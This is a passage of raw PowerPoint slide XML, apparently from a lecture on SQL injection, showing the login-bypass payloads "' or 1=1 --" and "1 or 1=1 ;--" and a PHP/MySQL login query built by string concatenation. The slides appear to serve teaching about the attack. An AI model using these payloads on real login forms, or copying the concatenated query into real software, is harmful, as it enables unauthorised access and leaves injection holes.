                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>formpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> + "'"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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31</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>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43000" y="198438"/>
            <a:ext cx="6172200"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0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Injecting through Strings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="8305800" cy="49530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Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>formusr </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>' or 1=1 – – </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>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Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>formpwd </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>= anything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>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Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Final query would look like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WHERE username = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>' or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>– –</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>AND password = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>anything</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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32</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>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295400" y="228600"/>
            <a:ext cx="5791200"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0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>If it were numeric?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8229600" cy="48307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Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>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SELECT * FROM clients </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>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WHERE user= </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>12345678</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>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AND pas= </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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PHP/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1"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MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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login syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>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t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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sql</a:t>
            </a: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 "SELECT * FROM clients WHERE " . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>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“user= </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>formusr</a:t>
            </a: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AND " . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>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“pas= </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>formpas</a:t>
            </a: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endParaRPr kumimoji="0" lang="en-US" sz="24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4"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33</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>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219200" y="198438"/>
            <a:ext cx="6324600"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0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Injecting Numeric Fields</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8229600" cy="48307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Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>formusr</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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24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1 or 1=1 ;-- </a:t>
            </a:r>
            <a:endPar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Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
